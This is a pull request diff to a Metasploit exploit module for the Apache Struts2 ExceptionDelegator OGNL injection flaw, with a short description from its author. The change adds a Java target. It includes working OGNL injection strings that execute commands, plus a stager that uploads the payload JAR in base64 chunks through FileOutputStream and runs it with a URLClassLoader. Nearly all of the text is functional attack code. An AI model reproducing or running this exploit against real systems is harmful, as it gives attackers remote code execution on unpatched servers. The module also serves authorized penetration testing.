### PR TITLE
Add ARCH_JAVA support to struts_code_exec_exception_delegator

### DIFF
--- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
+++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
@@ -29,7 +29,8 @@ class Metasploit3 < Msf::Exploit::Remote
 					'Johannes Dahse', # Vulnerability discovery and PoC
 					'Andreas Nusser', # Vulnerability discovery and PoC
 					'juan vazquez', # Metasploit module
-					'sinn3r' # Metasploit module
+					'sinn3r', # Metasploit module
+					'mihi' # ARCH_JAVA support
 				],
 			'License'        => MSF_LICENSE,
 			'Version'        => '$Revision: $',
@@ -40,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					[ 'EDB', '18329'],
 					[ 'URL', 'https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt']
 				],
-			'Platform'      => [ 'win', 'linux'],
+			'Platform'      => [ 'win', 'linux', 'java'],
 			'Privileged'     => true,
 			'Targets'        =>
 				[
@@ -56,6 +57,12 @@ class Metasploit3 < Msf::Exploit::Remote
 								'Platform' => 'linux'
 						}
 					],
+					[ 'Java Universal',
+						{
+								'Arch' => ARCH_JAVA,
+								'Platform' => 'java'
+						},
+					]
 				],
 			'DisclosureDate' => 'Jan 06 2012',
 			'DefaultTarget' => 0))
@@ -73,6 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		uri = String.new(datastore['TARGETURI'])
 		uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec(\"CMD\"))%2b'") if target['Platform'] == 'win'
 		uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec(\"CMD\".split(\"@\")))%2b'") if target['Platform'] == 'linux'
+		uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,CMD,'')%2b'") if target['Platform'] == 'java'
 		uri.gsub!(/CMD/, Rex::Text::uri_encode(cmd))
 
 		vprint_status("Attempting to execute: #{cmd}")
@@ -120,6 +128,44 @@ class Metasploit3 < Msf::Exploit::Remote
 		@payload_exe = "/tmp/" + file
 	end
 
+	def java_upload_part(part, filename, append = 'false')
+		cmd = ""
+		cmd << "#f=new java.io.FileOutputStream('#{filename}',#{append}),"
+		cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),"
+		cmd << "#f.close()"
+		execute_command(cmd)
+	end
+
+	def java_stager
+		@payload_exe = rand_text_alphanumeric(4+rand(4)) + ".jar"
+		append = 'false'
+		jar = payload.encoded_jar.pack
+
+		chunk_length = 384 # 512 bytes when base64 encoded
+
+		while(jar.length > chunk_length)
+			java_upload_part(jar[0, chunk_length], @payload_exe, append)
+			jar = jar[chunk_length, jar.length - chunk_length]
+			append='true'
+		end
+		java_upload_part(jar, @payload_exe, append)
+
+		cmd = ""
+		# disable Vararg handling (since it is buggy in OGNL used by Struts 2.1
+		cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
+		cmd << "#q.setAccessible(true),#q.set(null,true),"
+		cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
+		cmd << "#q.setAccessible(true),#q.set(null,false),"
+		# create classloader
+		cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),"
+		# load class
+		cmd << "#c=#cl.loadClass('metasploit.Payload'),"
+		# invoke main method
+		cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
+		cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
+		execute_command(cmd)
+	end
+
 	def on_new_session(client)
 		if target['Platform'] == 'linux'
 			print_status("Deleting #{@payload_exe} payload file")
@@ -142,6 +188,8 @@ class Metasploit3 < Msf::Exploit::Remote
 				linux_stager
 			when 'win'
 				windows_stager
+			when 'java'
+				java_stager
 			else
 				raise RuntimeError, 'Unsupported target platform!'
 		end


### PR DESCRIPTION
It will chop the payload JAR file into chunks of 384 bytes, base64 encode them (resulting in 512 bytes each) and then use OGNL to append each chunk to a remote file via FileOutputStream. Then a new class loader is created, which is used to lookup and execute metasploit.Payload inside the jar. Increasing the chunk length worked well when testing with the struts hello world project, but better safe than sorry.

(Another possible approach to implement this would be to use a HTTP URL pointing back at the attacker instead of the file URL. This would avoid all the hassle with uploading the JAR file and avoid touching disk, but the exploited machine would have to be able to connect back to the attacker)
